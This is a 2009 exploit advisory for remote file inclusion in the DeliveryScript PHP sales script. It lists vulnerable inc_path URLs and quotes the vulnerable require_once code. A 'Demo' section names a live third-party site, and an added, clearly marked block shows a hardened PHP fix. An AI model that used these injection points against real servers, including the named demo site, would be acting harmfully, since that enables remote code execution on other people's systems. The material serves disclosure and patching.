
DeliveryScript Multiple Remote File Include

November 7, 2009 | Posted in ExploitAlert

[+] Author : kaMtiEz (kamzcrew@yahoo.com)
[+] Homepage : http://www.indonesiancoder.com
[+] Date : October 30, 2009
[+] Location : INDONESIA - Jogja

######################################
[ Software Information ]

[+] Vendor : http://www.deliveryscript.com/
[+] Download : -
[+] version : v25 or lower
[+] Price : - Unlimited = $199
            - Professional = $99
            - Standard = $39
[+] Vulnerability : RFI
[+] Dork : Indonesian Coder Team & Kill-9 Crew
#####################################
[ Vulnerable File ]

http://127.0.0.1/[PATH]/ds-inc/inc.php?inc_path=[INDONESIANCODER]
http://127.0.0.1/[PATH]/ds-inc/functions.php?inc_path=[INDONESIANCODER]
http://127.0.0.1/[PATH]/ds-inc/setups.php?inc_path=[INDONESIANCODER]
######################################
[ PoC ]

[+] inc.php


require_once($inc_path . 'functions.php');
require_once($inc_path . 'setups.php');


[+] functions.php

require_once($inc_path . 'functions/admin/function.invalidate_admin.php');
require_once($inc_path . 'functions/admin/function.is_valid_admin.php');
require_once($inc_path . 'functions/admin/function.set_valid_admin.php');
require_once($inc_path . 'functions/sms/function.send_clickatell_sms.php');
require_once($inc_path . 'functions/util/function._decrypt.php');
require_once($inc_path . 'functions/util/function._encrypt.php');
require_once($inc_path . 'functions/util/function.filesize_format.php');
require_once($inc_path . 'functions/util/function.get_host.php');
require_once($inc_path . 'functions/util/function.get_uri.php');
require_once($inc_path . 'functions/util/function.get_user_ip.php');
require_once($inc_path . 'functions/function._array_unique.php');
require_once($inc_path . 'functions/function.block_link.php');
require_once($inc_path . 'functions/function.download_file_exists.php');
require_once($inc_path . 'functions/function.generate_auth.php');
require_once($inc_path . 'functions/function.get_product.php');
require_once($inc_path . 'functions/function.is_blocked.php');
require_once($inc_path . 'functions/function.is_valid_download_request.php');
require_once($inc_path . 'functions/function.is_valid_payment.php');
require_once($inc_path . 'functions/function.notify_idevaffiliate.php');
require_once($inc_path . 'functions/function.process_order.php');
require_once($inc_path . 'functions/function.product_exists.php');
require_once($inc_path . 'functions/function.resend_order_email.php');
require_once($inc_path . 'functions/function.returned_txn_id_exists.php');
require_once($inc_path . 'functions/function.sectostr.php');
require_once($inc_path . 'functions/function.send_echeck_delay_notice.php');
require_once($inc_path . 'functions/function.send_manual_process_notice.php');
require_once($inc_path . 'functions/function.send_order_email.php');
require_once($inc_path . 'functions/function.txn_id_exists.php');


[+] setups.php

require_once($inc_path . 'setups/setup.phpmailer.php');
require_once($inc_path . 'setups/setup.phpxml.php');
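
Added example (not part of the original advisory and not DeliveryScript's own code): the listings above prefix every require_once with $inc_path, so a hardened inc.php takes the base path from its own location instead. It assumes the shipped file never assigns $inc_path itself; DS_INC_PATH and ds_path() are hypothetical names.

```php
<?php
// Added example, not DeliveryScript's code: a hardened ds-inc/inc.php.
// Assumption: the shipped file never assigns $inc_path, so a request value
// (register_globals = On) is what reaches require_once().

// DS_INC_PATH is a hypothetical constant; the base directory is derived from
// this file's own location and never from the request.
define('DS_INC_PATH', realpath(dirname(__FILE__)) . DIRECTORY_SEPARATOR);

// Include-only file: refuse to run when it is the script requested over HTTP.
if (isset($_SERVER['SCRIPT_FILENAME'])
    && realpath($_SERVER['SCRIPT_FILENAME']) === realpath(__FILE__)) {
    header('HTTP/1.1 403 Forbidden');
    exit;
}

/**
 * Map a relative name to an existing file under DS_INC_PATH.
 * ds_path() is a hypothetical helper. Throws instead of returning a path
 * that is remote, uses a stream wrapper, or escapes the base directory.
 */
function ds_path($relative)
{
    // "scheme:" prefixes cover http://, ftp://, php://, data: and friends.
    if (preg_match('#^[a-z][a-z0-9+.-]*:#i', $relative)
        || strpos($relative, "\0") !== false) {
        throw new RuntimeException('Rejected include name');
    }
    // realpath() collapses "../" and returns false for missing files.
    $full = realpath(DS_INC_PATH . $relative);
    if ($full === false || !is_file($full)
        || strncmp($full, DS_INC_PATH, strlen(DS_INC_PATH)) !== 0) {
        throw new RuntimeException('Rejected include name');
    }
    return $full;
}

// Same chain as the original inc.php, without any request-controlled prefix.
// require_once stays at file scope so included variables remain global.
require_once ds_path('functions.php');
require_once ds_path('setups.php');

// functions.php and setups.php need the same treatment for their own
// require_once lists. php.ini, as defence in depth: allow_url_include = Off;
// register_globals = Off (the directive was removed in PHP 5.4).
```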

######################################
[ Demo ]

http://prkg.com/wallstreet/ds-inc/inc.php?inc_path=[kaMtiEz]
http://prkg.com/wallstreet/ds-inc/functions.php?inc_path=[kaMtiEz]
http://prkg.com/wallstreet/ds-inc/setups.php?inc_path=[kaMtiEz]
######################################
[ Thx TO ]

[+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW
[+] tukulesto, M3NW5, arianom, tiw0L, Pathloader, abah_benu, VycOd, och3_an3h
[+] Contrex,onthel,yasea,bugs,olivia,Jovan,Aar,Ardy,invent,Ronz
[+] Coracore,black666girl,NepT,ichal,tengik,Gh4mb4s,rendy and YOU!!
######################################
[ NOTE ]

[+] thanks to dad and mom and my little sibling .... muach ..
[+] AuraKasih, what is going on with you ???
[+] For M3NW5: hey, Om Don Tukulesto is waiting for you !! And you just disappeared ..
[+] For Don Tukulesto .. Nothing to say .. u are best !
[+] To all IndonesianCoder and kill-9 members .. keep up the spirit !!!
[+] Saturday night, half past seven .. was about to go visit my girlfriend and found a vulnerability instead .. haha
